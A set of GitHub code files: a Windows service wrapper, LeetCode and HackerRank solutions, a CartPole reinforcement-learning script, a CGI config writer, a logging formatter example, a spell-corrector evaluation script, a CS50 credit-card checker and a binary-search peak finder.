+{"seq_id":"26902080174","text":"import os\nimport subprocess\nimport copy \nimport socket\nimport win32serviceutil\n\nimport servicemanager\nimport win32event\nimport win32service\nimport sys\nfrom winreg import *\nimport winreg\n\nfrom loggers import logger\n\n# get path from registry stored for the application by the installer\n\nWORKING_DIR = os.path.abspath(__file__)\nlogger.info(WORKING_DIR) \n\n\nENVIRONMENT = copy.deepcopy(os.environ)\n\n\nclass SalesOrderBookService(win32serviceutil.ServiceFramework):\n _svc_name_ = \"SalesOrderBookService\"\n _svc_display_name_ = \"SALES_ORDER_BOOK_SERVICE\"\n _svc_description_ = \"Pushes sales order book changes every hour\"\n\n\n @classmethod\n def parse_command_line(cls):\n win32serviceutil.HandleCommandLine(cls)\n\n def __init__(self, *args):\n super().__init__(*args)\n self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\n socket.setdefaulttimeout(60)\n\n def SvcStop(self):\n self.stop()\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n win32event.SetEvent(self.hWaitStop)\n \n def SvcDoRun(self):\n self.start()\n servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,\n servicemanager.PYS_SERVICE_STARTED,\n (self._svc_name_, ''))\n self.main()\n\n def start(self):\n logger.info(\"starting service\")\n\n def stop(self):\n logger.info(\"stopping service\")\n\n\n def main(self):\n logger.info(\"running service\")\n subprocess.Popen(['python', 'main.py'], env=ENVIRONMENT)\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n servicemanager.Initialize()\n servicemanager.PrepareToHostSingle(SalesOrderBookService)\n servicemanager.StartServiceCtrlDispatcher()\n else:\n win32serviceutil.HandleCommandLine(SalesOrderBookService)","repo_name":"nakamura9/sync_service","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"38427395931","text":"\"\"\"\n城市用一个 双向连通 图表示,图中有 n 个节点,从 1 到 n 编号(包含 1 和 n)。图中的边用一个二维整数数组 edges 表示,其中每个 edges[i] = [ui, vi] 表示一条节点 ui 和节点 vi 之间的双向连通边。每组节点对由 最多一条 边连通,顶点不存在连接到自身的边。穿过任意一条边的时间是 time 分钟。\n\n每个节点都有一个交通信号灯,每 change 分钟改变一次,从绿色变成红色,再由红色变成绿色,循环往复。所有信号灯都 同时 改变。你可以在 任何时候 进入某个节点,但是 只能 在节点 信号灯是绿色时 才能离开。如果信号灯是 绿色 ,你 不能 在节点等待,必须离开。\n\n第二小的值 是 严格大于 最小值的所有值中最小的值。\n 例如,[2, 3, 4] 中第二小的值是 3 ,而 [2, 2, 4] 中第二小的值是 4 。\n\n给你 n、edges、time 和 change ,返回从节点 1 到节点 n 需要的 第二短时间 。\n\n注意:\n 你可以 任意次 穿过任意顶点,包括 1 和 n 。\n 你可以假设在 启程时 ,所有信号灯刚刚变成 绿色 。\n\n示例 1:\n 输入:n = 5, edges = [[1,2],[1,3],[1,4],[3,4],[4,5]], time = 3, change = 5\n 输出:13\n 解释:\n 上面的左图展现了给出的城市交通图。\n 右图中的蓝色路径是最短时间路径。\n 花费的时间是:\n - 从节点 1 开始,总花费时间=0\n - 1 -> 4:3 分钟,总花费时间=3\n - 4 -> 5:3 分钟,总花费时间=6\n 因此需要的最小时间是 6 分钟。\n\n 右图中的红色路径是第二短时间路径。\n - 从节点 1 开始,总花费时间=0\n - 1 -> 3:3 分钟,总花费时间=3\n - 3 -> 4:3 分钟,总花费时间=6\n - 在节点 4 等待 4 分钟,总花费时间=10\n - 4 -> 5:3 分钟,总花费时间=13\n 因此第二短时间是 13 分钟。 \n\n示例 2:\n 输入:n = 2, edges = [[1,2]], time = 3, change = 2\n 输出:11\n 解释:\n 最短时间路径是 1 -> 2 ,总花费时间 = 3 分钟\n 最短时间路径是 1 -> 2 -> 1 -> 2 ,总花费时间 = 11 分钟\n\n提示:\n 2 <= n <= 10^4\n n - 1 <= edges.length <= min(2 * 10^4, n * (n - 1) / 2)\n edges[i].length == 2\n 1 <= ui, vi <= n\n ui != vi\n 不含重复边\n 每个节点都可以从其他节点直接或者间接到达\n 1 <= time, change <= 10^3\n\n\"\"\"\nfrom typing import List\nfrom collections import deque\n\nclass Solution:\n def secondMinimum(self, n: int, edges: List[List[int]], time: int, change: int) -> int:\n graph = [[] for _ in range(n + 1)]\n for e in edges:\n x, y = e[0], e[1]\n graph[x].append(y)\n graph[y].append(x)\n\n # dist[i][0] 表示从 1 到 i 的最短路长度,dist[i][1] 表示从 1 到 i 的严格次短路长度\n dist = [[float('inf')] * 2 for _ in range(n + 1)]\n dist[1][0] = 0\n q = deque([(1, 0)])\n while dist[n][1] == float('inf'):\n p = q.popleft()\n for y in graph[p[0]]:\n d = p[1] + 1\n if d < dist[y][0]:\n dist[y][0] = d\n q.append((y, d))\n elif dist[y][0] < d < dist[y][1]:\n dist[y][1] = d\n q.append((y, d))\n\n ans = 0\n for _ in range(dist[n][1]):\n if ans % (change * 2) >= change:\n ans += change * 2 - ans % (change * 2)\n ans += time\n return ans\n\nif __name__ == \"__main__\":\n n = 5\n edges = [[1,2],[1,3],[1,4],[3,4],[4,5]]\n time = 3\n change = 5\n sol = Solution()\n result = sol.secondMinimum(n, edges, time, change)\n print(result)","repo_name":"jasonmayday/LeetCode","sub_path":"leetcode_algorithm/3_hard/2045_到达目的地的第二短时间.py","file_name":"2045_到达目的地的第二短时间.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"74113258980","text":"#!/usr/bin/env python3\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib.layers import *\nimport sys\n\nenv = gym.make('CartPole-v0')\n\nRNG_SEED = 1\ntf.set_random_seed(RNG_SEED)\nenv.seed(RNG_SEED)\n\nalpha = 0.0001\ngamma = 0.99\n\nw_init = xavier_initializer(uniform=False)\nb_init = tf.constant_initializer(0.1)\n\ntry:\n output_units = env.action_space.shape[0]\nexcept AttributeError:\n output_units = env.action_space.n\n\ninput_shape = env.observation_space.shape[0]\nNUM_INPUT_FEATURES = 4\nx = tf.placeholder(tf.float32, shape=(None, NUM_INPUT_FEATURES), name='x')\ny = tf.placeholder(tf.float32, shape=(None, output_units), name='y')\n\nout = fully_connected(inputs=x,\n num_outputs=output_units,\n activation_fn=tf.nn.softmax,\n weights_initializer=w_init,\n weights_regularizer=None,\n biases_initializer=b_init,\n scope='fc')\n\nall_vars = tf.global_variables()\n\npi = tf.contrib.distributions.Bernoulli(p=out, name='pi')\npi_sample = pi.sample()\nlog_pi = pi.log_prob(y, name='log_pi')\n\nReturns = tf.placeholder(tf.float32, name='Returns')\noptimizer = tf.train.GradientDescentOptimizer(alpha)\ntrain_op = optimizer.minimize(-1.0 * Returns * log_pi)\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nMEMORY = 25\nMAX_STEPS = env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n\n\ntrack_steps = []\ntrack_returns = []\n\n# For LaTeX plotting\nw1_plot = ''\nw2_plot = ''\nw3_plot = ''\nw4_plot = ''\nw5_plot = ''\nw6_plot = ''\nw7_plot = ''\nw8_plot = ''\nreturns_plot = ''\nsteps_plot = ''\n\nfor ep in range(2001):\n obs = env.reset()\n\n G = 0\n ep_states = []\n ep_actions = []\n ep_rewards = [0]\n done = False\n t = 0\n I = 1\n while not done:\n ep_states.append(obs)\n env.render()\n action = sess.run([pi_sample], feed_dict={x: [obs]})[0][0]\n ep_actions.append(action)\n obs, reward, done, info = env.step(action[0])\n ep_rewards.append(reward * I)\n G += reward * I\n I *= gamma\n\n t += 1\n if t >= MAX_STEPS:\n break\n\n returns = np.array([G - np.cumsum(ep_rewards[:-1])]).T\n index = ep % MEMORY\n\n print(np.array(ep_states))\n\n _ = sess.run([train_op], feed_dict={x: np.array(ep_states),\n y: np.array(ep_actions),\n Returns: returns})\n\n track_steps.append(t)\n track_steps = track_steps[-MEMORY:]\n mean_steps = np.mean(track_steps)\n\n track_returns.append(G)\n track_returns = track_returns[-MEMORY:]\n mean_return = np.mean(track_returns)\n\n print(\"Episode {} finished after {} steps with return {}\".format(ep, t, G))\n print(\"Mean return over the last {} episodes is {}\".format(MEMORY, mean_return))\n print(\"Mean number of steps over the last {} episodes is {}\".format(MEMORY, mean_steps))\n\n with tf.variable_scope('fc', reuse=True):\n weights = sess.run(tf.get_variable('weights'))\n print(\"Weights:\")\n print(weights)\n\n if ep % 20 == 0:\n w1_plot += str((ep, weights[0, 0]))\n w2_plot += str((ep, weights[0, 1]))\n w3_plot += str((ep, weights[1, 0]))\n w4_plot += str((ep, weights[1, 1]))\n w5_plot += str((ep, weights[2, 0]))\n w6_plot += str((ep, weights[2, 1]))\n w7_plot += str((ep, weights[3, 0]))\n w8_plot += str((ep, weights[3, 1]))\n returns_plot += str((ep, mean_return))\n steps_plot += str((ep, mean_steps))\n\nprint('w1:', w1_plot)\nprint('w2:', w2_plot)\nprint('w3:', w3_plot)\nprint('w4:', w4_plot)\nprint('w5:', w5_plot)\nprint('w6:', w6_plot)\nprint('w7:', w7_plot)\nprint('w8:', w8_plot)\nprint('returns:', returns_plot)\nprint('steps:', 
steps_plot)\n\nsess.close()\n","repo_name":"azmsu/reinforcement-learning","sub_path":"cartpole-reinforce.py","file_name":"cartpole-reinforce.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"22802606247","text":"#!../python35/python.exe\nprint (\"Content-type: text/html\\n\")\nimport cgi\nimport cgitb; cgitb.enable()\nform = cgi.FieldStorage()\nnombre = form.getfirst(\"nombre\");\ndificuldad = form.getfirst(\"dificuldad\");\npocision = form.getfirst(\"pocision\");\nelementos = form.getfirst(\"elementos\");\nreloj = form.getfirst(\"reloj\");\ntiempo_juego = form.getfirst(\"tiempo_juego\");\ntiempo_jugada = form.getfirst(\"tiempo_jugada\");\ntiempo_multinivel = form.getfirst(\"tiempo_multinivel\");\n\n\ncolor = form.getfirst(\"fcolor\");\n\n\nconfig = open(\"datos/config.dat\",\"w\")\n\nconfig.write(nombre+\",\"+dificuldad+\",\"+pocision+\",\"+elementos+\",\"+reloj+\",\"+tiempo_jugada+\",\"+tiempo_juego+\",\"+tiempo_multinivel+\",\"+color)\n\nprint('''''')","repo_name":"cecilianogranados96/Proyecto-Iphone","sub_path":"MasterMind/process_config.py","file_name":"process_config.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"44309123973","text":"### this script convert a config.dat file to produce output files 'mycal.in' and 'radius.dat'.\n\nimport numpy as np\nimport pandas as pd\n\ndf=pd.read_csv('config.dat',header=None,skiprows=0)\n\nradius=df.iloc[0].tolist()[0].split()[-3]\n\nf=open('radius.dat','w')\nf.write(str(radius+'\\n'))\nf.close()\n\nf=open('mycal.in','w')\nf.write('** total number of varaibles'+'\\n')\nf.write('** data begins from line 27 and onwards'+'\\n')\nf.write('** the rest are all dummies'+'\\n')\n\nfor i in range(4,27):\n f.write('**'+'\\n')\n \ncount=0 \nfor i in range(len(df)):\n line=df.iloc[i].tolist()[0]\n x=line.split()[0]\n y=line.split()[1]\n z=line.split()[2]\n count=count+1;\n state='variable '+ str(count) + ' ' + x\n #print(state)\n f.write(state+'\\n')\n \n count=count+1;\n #print(count,y);\n state='variable '+ str(count) + ' ' + y\n #print(state)\n f.write(state+'\\n')\n \n count=count+1\n #print(count,z);\n state='variable '+ str(count) + ' ' + z\n #print(state)\n f.write(state+'\\n')\nf.write('end'+'\\n')\t\nf.close()\n \n\n","repo_name":"tlyoon/mock-data-generation","sub_path":"convert_config.dat2mycal.in.py","file_name":"convert_config.dat2mycal.in.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"39617524529","text":"from prelogging import LCDict\nimport logging\n\nKEYWORD = 'my_keyword'\n\n# \"class formatter\"\n\nclass MyFormatter(logging.Formatter):\n def __init__(self, **kwargs):\n self.value=kwargs.pop(KEYWORD, '')\n kwargs.pop('class', None)\n s = super(MyFormatter, self).__init__(**kwargs)\n\n def format(self, logrecord, *args, **kwds):\n message = super(MyFormatter, self).format(logrecord, *args, **kwds)\n return 'MyFormatter [%r: %r] says: %s' % (KEYWORD, self.value, message)\n\n\nif __name__ == '__main__':\n lcd = LCDict(attach_handlers_to_root=True)\n lcd.add_formatter( 'my_formatter',\n format='%(name)s - %(levelname)s - %(message)s',\n # dateformat=...,\n # style=?,\n ** {'()': MyFormatter,\n KEYWORD: 'my_value'} )\n lcd.add_stdout_handler('out', formatter='my_formatter')\n lcd.config()\n\n root = logging.getLogger()\n root.debug(\"Debug.\")\n root.info(\"Info.\")\n root.warning(\"Warning.\")\n root.error(\"Error.\")\n root.critical(\"Critical.\")\n \"\"\"\n MyFormatter ['my_keyword': 'my_value'] says: root - WARNING - Warning.\n MyFormatter ['my_keyword': 'my_value'] says: root - ERROR - Error.\n MyFormatter ['my_keyword': 'my_value'] says: root - CRITICAL - Critical.\n \"\"\"\n","repo_name":"Twangist/prelogging","sub_path":"examples/custom_class_formatter.py","file_name":"custom_class_formatter.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"}
+{"seq_id":"42465381709","text":"import sys\n\ndef candies(n, arr):\n # Complete this function\n candies = [1]*n\n # forward check\n for i in range(1, len(arr)):\n # determine candies[i] by comparison\n if arr[i] > arr[i-1]:\n candies[i] = candies[i-1] + 1\n # backward check\n for j in range(len(arr)-2, -1, -1):\n if arr[j] > arr[j+1] and candies[j] <= candies[j+1]:\n candies[j] = candies[j+1] + 1\n \n return sum(candies)\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n arr = []\n arr_i = 0\n for arr_i in range(n):\n arr_t = int(input().strip())\n arr.append(arr_t)\n result = candies(n, arr)\n print(result)","repo_name":"seLain/codesnippets","sub_path":"python3/hackerrank_leetcode/candies/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"72356709222","text":"# coding=utf-8\n#!/usr/bin/python3\n\n''' Measure metrics (5 tests average) from spellcorrector.py, with several operation modes\n\nIndicates several metrics (avarage) for each operation mode (\"Manual\", Aspell, Hunspell and\nSymspell):\n * True Positives Wrong\n * True Positives Right\n * True Negatives\n * False Positives\n * False Negatives\n * Accuracy\n * Precision\n * Recall\n * Harmonic Mean\n * True Positives Rate\n * False Positives Rate\n * Execution Duration (sec)\n'''\n\nimport sys\nimport time\nimport fileinput\n\nimport regex\nimport numpy as np\nfrom prettytable import PrettyTable\n\nimport spellcorrector\n\ndef is_word(token):\n \"Indicates if token is a `word`.\"\n return bool(regex.search(r'\\w+', token, flags=regex.UNICODE))\n\ndef process_token(token):\n \"Process token.\"\n if len(token) <= 3:\n n_changes = np.random.choice([0, 1], p=[3.0/4.0, 1.0/4.0])\n else:\n n_changes = np.random.choice([0, 1, 2], p=[3.0/4.0, 0.8/4.0, 0.2/4.0])\n\n changes = np.random.choice([1, 2, 3, 4], size=(n_changes))\n for change in changes:\n if change == 1: # delete\n if len(token) > 1:\n i_rand = np.random.randint(0, len(token))\n token = token[0:i_rand] + token[i_rand+1:]\n elif change == 2: # transposes (i <-> i+1)\n if len(token) > 1:\n i_rand = np.random.randint(0, len(token)-1)\n token = token[0:i_rand] + token[i_rand+1] + token[i_rand] + token[i_rand+2:]\n elif change == 3: # replaces\n i_rand = np.random.randint(0, len(token))\n new_char = np.random.choice(list('aáàãâbcçdeéèêfghiíìîjklmnoóòõôpqrstuúùûvwxyz' +\\\n 'AÁÀÃÂBCÇDEÉÈÊFGHIÍÌÎJKLMNOÓÒÕÔPQRSTUÚÙÛVWXYZ'))\n token = token[0:i_rand] + new_char + token[i_rand+1:]\n else: # inserts\n i_rand = np.random.randint(0, len(token))\n new_char = np.random.choice(list('aáàãâbcçdeéèêfghiíìîjklmnoóòõôpqrstuúùûvwxyz' +\\\n 'AÁÀÃÂBCÇDEÉÈÊFGHIÍÌÎJKLMNOÓÒÕÔPQRSTUÚÙÛVWXYZ'))\n token = token[0:i_rand] + new_char + token[i_rand:]\n return token\n\n\ndef gen_text_with_errors(tokens):\n \"Generate text with errors, from `tokens` list.\"\n errors_tokens = []\n for token in tokens:\n if is_word(token) and len(token) > 1:\n errors_tokens.append(process_token(token))\n else:\n errors_tokens.append(token)\n\n return ''.join(errors_tokens)\n\n\ndef classification(original_word, errors_word, corrected_word):\n \"Classify spell correction as TPW, TPR, TN, FP or FN.\"\n # True Positives\n if original_word != errors_word and errors_word != corrected_word:\n # Correção errada\n if original_word != corrected_word:\n return 'TPW'\n # Correção correta\n return 'TPR'\n # True Negatives\n if original_word == errors_word and errors_word == corrected_word:\n return 'TN'\n # False Positives\n if original_word == errors_word and errors_word != corrected_word:\n return 'FP'\n # False Negatives\n if original_word != errors_word and errors_word == corrected_word:\n return 'FN'\n return None\n\n\ndef get_wrong_texts(n_tests, original_tokens):\n \"Get `n_tests` texts with errors.\"\n wrong_texts = []\n with open('metrics_errors.txt', 'w+') as file_desc:\n for i in range(n_tests):\n errors_text = gen_text_with_errors(original_tokens)\n wrong_texts.append(errors_text)\n print(f'\\n-- TESTE {i} --', file=file_desc)\n print(errors_text, file=file_desc)\n return wrong_texts\n\n\ndef get_metrics(function_name, id_test, function, original_tokens, errors_text):\n \"Calculates metrics.\"\n errors_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', errors_text, flags=regex.UNICODE)\n\n # Corrigir erros do texto\n print(f'-- Correção dos erros do texto com 
função {function_name} - Teste {str(id_test)} --',\n file=sys.stderr)\n if function_name == 'Manual':\n time1 = time.time()\n pos_freq, words_freq = spellcorrector.analyze_large_text()\n time2 = time.time()\n corrected_text = spellcorrector.correct_text(pos_freq, words_freq,\n text_lines=errors_text.split('\\n'))\n time3 = time.time()\n duration = (time2-time1, time3-time2)\n else:\n time1 = time.time()\n corrected_text = spellcorrector.correct_text_ext(errors_text.split('\\n'), function)\n time2 = time.time()\n duration = time2-time1\n\n corrected_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', corrected_text, flags=regex.UNICODE)\n with open('metrics_corrected.txt', 'a+') as file_desc:\n print(f'\\n-- FUNÇÃO {function_name} - TESTE {id_test} --', file=file_desc)\n print(corrected_text, file=file_desc)\n\n # Calcular métricas\n print('-- Cálculo de métricas --', file=sys.stderr)\n true_positives_wrong_correction = 0 # Há erro e token é corrigido incorretamente\n true_positives_right_correction = 0 # Há erro e token é corrigido corretamente\n true_negatives = 0 # Não há erro e token mantém-se\n false_positives = 0 # Não há erro, mas token é corrigido\n false_negatives = 0 # Há erro, mas este não é corrigido\n total_words = 0\n\n for i, token in enumerate(original_tokens):\n if is_word(token) or is_word(errors_tokens[i]) or is_word(corrected_tokens[i]):\n total_words += 1\n classif = classification(token, errors_tokens[i], corrected_tokens[i])\n # True Positives, Correção errada\n if classif == 'TPW':\n true_positives_wrong_correction += 1\n # True Positives, Correção correta\n elif classif == 'TPR':\n true_positives_right_correction += 1\n # True Negatives\n elif classif == 'TN':\n true_negatives += 1\n # False Positives\n elif classif == 'FP':\n false_positives += 1\n # False Negatives\n elif classif == 'FN':\n false_negatives += 1\n\n return true_positives_wrong_correction, true_positives_right_correction, true_negatives, \\\n false_positives, false_negatives, total_words, duration\n\n\ndef run_tests(function_name, function, original_tokens, wrong_texts, n_tests):\n \"Run tests.\"\n true_positives_wrong_correction = 0 # Há erro e token é corrigido incorretamente\n true_positives_right_correction = 0 # Há erro e token é corrigido corretamente\n true_negatives = 0 # Não há erro e token mantém-se\n false_positives = 0 # Não há erro, mas token é corrigido\n false_negatives = 0 # Há erro, mas este não é corrigido\n total_words = 0\n duration = 0\n\n for i in range(0, n_tests):\n m_tpw, m_tpr, m_tn, m_fp, m_fn, m_tw, m_d = get_metrics(function_name, i, function,\n original_tokens, wrong_texts[i])\n true_positives_wrong_correction += m_tpw\n true_positives_right_correction += m_tpr\n true_negatives += m_tn\n false_positives += m_fp\n false_negatives += m_fn\n total_words += m_tw\n if isinstance(m_d, tuple):\n if i == 0:\n duration = [m_d[0], m_d[1]]\n else:\n duration[0] += m_d[0]\n duration[1] += m_d[1]\n else:\n duration += m_d\n\n true_positives_wrong_correction /= n_tests\n true_positives_right_correction /= n_tests\n true_negatives /= n_tests\n false_positives /= n_tests\n false_negatives /= n_tests\n total_words /= n_tests\n if isinstance(duration, list):\n duration[0] /= n_tests\n duration[1] /= n_tests\n else:\n duration /= n_tests\n\n true_positives = true_positives_right_correction + true_positives_wrong_correction\n\n if total_words > 0:\n accuracy = round((true_positives_right_correction + true_negatives) / total_words, 2)\n\n if true_positives + false_positives > 0:\n precision = 
round(true_positives_right_correction / (true_positives + false_positives),\n 2)\n else:\n precision = None\n\n if true_positives + false_negatives > 0:\n recall = round(true_positives_right_correction / (true_positives + false_negatives), 2)\n else:\n recall = None\n\n if precision and recall and precision + recall > 0:\n harmonic_mean = round(2 * ((precision * recall) / (precision + recall)), 2)\n else:\n harmonic_mean = None\n\n if true_positives + false_negatives > 0:\n true_positive_rate = round(true_positives_right_correction /\n (true_positives + false_negatives), 2)\n else:\n true_positive_rate = None\n\n if false_positives + true_negatives > 0:\n false_positive_rate = round(false_positives / (false_positives + true_negatives), 2)\n else:\n false_positive_rate = None\n else:\n accuracy = None\n precision = None\n recall = None\n harmonic_mean = None\n true_positive_rate = None\n false_positive_rate = None\n\n return true_positives_wrong_correction, true_positives_right_correction, true_negatives,\\\n false_positives, false_negatives, accuracy, precision, recall, harmonic_mean,\\\n true_positive_rate, false_positive_rate, duration\n\n\ndef main():\n \"Main function.\"\n # Ler texto correto\n print('-- Leitura do texto correto --', file=sys.stderr)\n original_text = ''.join([line for line in fileinput.input(sys.argv[1:])])\n original_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', original_text, flags=regex.UNICODE)\n\n print('-- Inserção de erros no texto original (5x) --', file=sys.stderr)\n wrong_texts = get_wrong_texts(5, original_tokens)\n\n # Gerar estrutura da tabela output\n table = PrettyTable()\n table.field_names = [\"Medidas\", \"Manual\", \"Aspell\", \"Hunspell\", \"Symspell\"]\n tpw_list = ['True Positives Wrong']\n tpr_list = ['True Positives Right']\n tn_list = ['True Negatives']\n fp_list = ['False Positives']\n fn_list = ['False Negatives']\n accuracy_list = ['Accuracy']\n precision_list = ['Precision']\n recall_list = ['Recall']\n hm_list = ['Harmonic Mean']\n tp_rate_list = ['TP Rate']\n fp_rate_list = ['FP Rate']\n d_list = ['Duration (sec)']\n\n m_tpw, m_tpr, m_tn, m_fp, m_fn, accuracy, precision, recall, h_mean, tp_rate, fp_rate, dur = \\\n run_tests('Manual', spellcorrector.correct_text, original_tokens, wrong_texts, 5)\n tpw_list.append(m_tpw)\n tpr_list.append(m_tpr)\n tn_list.append(m_tn)\n fp_list.append(m_fp)\n fn_list.append(m_fn)\n accuracy_list.append(accuracy)\n precision_list.append(precision)\n recall_list.append(recall)\n hm_list.append(h_mean)\n tp_rate_list.append(tp_rate)\n fp_rate_list.append(fp_rate)\n d_list.append(f'{round(dur[0],2)} + {round(dur[1],2)}')\n\n function_names = [\"Aspell\", \"Hunspell\", \"Symspell\"]\n functions = [spellcorrector.correct_line_aspell, spellcorrector.correct_line_hunspell,\n spellcorrector.correct_line_symspell]\n for i in range(0, 3):\n m_tpw, m_tpr, m_tn, m_fp, m_fn, accuracy, precision, recall, h_mean, tp_rate, fp_rate, \\\n dur = run_tests(function_names[i], functions[i], original_tokens, wrong_texts, 5)\n tpw_list.append(m_tpw)\n tpr_list.append(m_tpr)\n tn_list.append(m_tn)\n fp_list.append(m_fp)\n fn_list.append(m_fn)\n accuracy_list.append(accuracy)\n precision_list.append(precision)\n recall_list.append(recall)\n hm_list.append(h_mean)\n tp_rate_list.append(tp_rate)\n fp_rate_list.append(fp_rate)\n d_list.append(str(round(dur, 2)))\n\n table.add_row(tpw_list)\n table.add_row(tpr_list)\n table.add_row(tn_list)\n table.add_row(fp_list)\n table.add_row(fn_list)\n table.add_row(accuracy_list)\n 
table.add_row(precision_list)\n table.add_row(recall_list)\n table.add_row(hm_list)\n table.add_row(tp_rate_list)\n table.add_row(fp_rate_list)\n table.add_row(d_list)\n\n print(table)\n\n\nif __name__ == \"__main__\":\n main()\n\n__author__ = \"João Barreira, Mafalda Nunes\"\n__email__ = \"a73831@alunos.uminho.pt, a77364@alunos.uminho.pt\"\n","repo_name":"barreira/spln-1819","sub_path":"tp3/scripts/metrics_measure.py","file_name":"metrics_measure.py","file_ext":"py","file_size_in_byte":12532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
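The metric definitions above are easier to check with concrete counts. A minimal numeric sketch (the counts below are invented for illustration; the script derives them from token comparisons):

# Illustrative counts only: 6 wrong tokens corrected correctly (TPR),
# 2 corrected to something still wrong (TPW), 1 left uncorrected (FN),
# 90 clean tokens kept (TN) and 1 clean token wrongly "corrected" (FP).
tpr, tpw, fn, tn, fp = 6, 2, 1, 90, 1
total_words = tpr + tpw + fn + tn + fp   # 100

tp = tpr + tpw                                        # all flagged errors: 8
accuracy = round((tpr + tn) / total_words, 2)         # (6 + 90) / 100 = 0.96
precision = round(tpr / (tp + fp), 2)                 # 6 / 9 = 0.67
recall = round(tpr / (tp + fn), 2)                    # 6 / 9 = 0.67
f1 = round(2 * precision * recall / (precision + recall), 2)  # 0.67
print(accuracy, precision, recall, f1)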
+{"seq_id":"6503734849","text":"import cs50\n\ndef checksum (c):\n card_length = 0\n first_two = 0\n \n ##other = even numbers, not odd ones!\n other_sum = 0\n nonother_sum = 0\n while c > 0: \n card_length+=1\n if card_length % 2 == 0 :\n if (c % 10 * 2) >= 10:\n other_sum += (c%10 * 2) + 1\n else:\n other_sum += (c%10 * 2)\n else:\n nonother_sum += (c%10)\n c=c//10 ##unlike in c, normal division would not round integer, since it would produce a float\n if c < 100 and c >=10:\n first_two = c\n \n if ((card_length != 13 and card_length is not 15 and card_length is not 16) or (((other_sum + nonother_sum) % 10) is not 0)):\n print(\"INVALID\\n\")\n \n else:\n if card_length == 15 or (first_two == 34 and first_two == 37):\n print (\"AMEX\\n\")\n elif (card_length == 16 and (51 <= first_two and first_two <= 55)):\n print (\"MASTERCARD\\n\")\n elif (card_length == 13 or card_length == 16) and (39 < first_two and first_two < 50):\n print (\"VISA\\n\")\n \ndef main():\n print (\"Input credit card number here: \", end=\"\")\n card_num = cs50.get_int() ##to take care of the possibility of user inputting a non-integer input\n checksum(card_num)\n \nif __name__ == '__main__':\n main()","repo_name":"NickSadjoli/cs50","sub_path":"pset6/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"31783682321","text":"__author__ = \"Cody Swain\"\n\nimport time\nimport math\n\n## TO DO ##\n# This algorithm is inefficient because it passes the whole array with each recursive pass.\n# Memory usage can be reduced simply using the indices with a while loop. \n\ndef binary_search_1d(arr):\n\t'''Binary search peak finding for a one dimensional array\n\tParameters\n\t----------\n\tarr : list\n\t\tList of numerical values with a peak.\n\t'''\n\n\t# Iteration metadata\n\tprint(\"Length: {len} \\t Array: {arr}\".format(arr=arr, len=len(arr)))\n\n\t# Algorithm Implementation\n\tn = len(arr)\n\tif n%2 == 0:\n\t\tmid_idx = int(n/2-1)\n\telse: \n\t\tmid_idx = int((n-1)/2)\n\tif arr[mid_idx] < arr[mid_idx-1]:\n\t\treturn binary_search(arr[:mid_idx])\n\telif arr[mid_idx] < arr[mid_idx+1]:\n\t\treturn binary_search(arr[mid_idx:])\n\telse: \n\t\tpeak = arr[mid_idx]\n\t\treturn peak\n\nif __name__ == \"__main__\":\n\t# Test Array\n\tarray = [1, 3, 5, 7, 9, 11, 13, 15, 17, 18, 16, 14, 12, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1]\n\t\n\t# Run binary search, and track runtime.\n\tprint(\"\\n\\nBinary search peak finding algorithm. \\n\")\n\tstart_time = time.time()\n\tpeak = binary_search(array)\n\tend_time = time.time()\n\tprint(\"\\nPeak found: {}\".format(peak))\n\tprint(\"Execution time: {}s\\n\\n\".format(end_time-start_time))","repo_name":"codyswain/Algorithms","sub_path":"binary_search_peak_finding.py","file_name":"binary_search_peak_finding.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
